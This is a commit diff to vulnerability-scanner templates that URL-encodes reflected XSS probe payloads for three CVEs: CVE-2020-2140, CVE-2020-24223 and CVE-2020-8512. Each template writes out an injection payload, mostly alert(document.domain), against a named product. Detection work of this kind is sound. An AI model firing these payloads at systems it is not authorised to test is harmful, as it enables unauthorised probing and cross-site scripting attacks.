Fix encoding for XSS payloads

Prevent false positives encoding the xss payloads, and remove from the match data that was not injected.

cves/CVE-2020-2140.yaml

@@ -10,8 +10,8 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample"
+      - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
-      - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample"
+      - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
 
     matchers-condition: and
     matchers:

cves/CVE-2020-24223.yaml

@@ -12,7 +12,7 @@ info:
 requests:
   - metod: GET
     path:
-      - '{{BaseURL}}/contact.php?theme=tes"><script>alert(document.domain)</script>'
+      - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
     matchers-condition: and
     matchers:
       - type: status

cves/CVE-2020-8512.yaml

@@ -12,13 +12,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/webmail/?color="><svg/onload=alert(document.domain)>"'
+      - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
-      - '{{BaseURL}}:32000/webmail/?color="><svg/onload=alert(document.domain)>"'
+      - '{{BaseURL}}:32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<svg/onload=alert(document.domain)>\"\">"
+          - "<svg/onload=alert(document.domain)>"
         part: body
       - type: status
         status: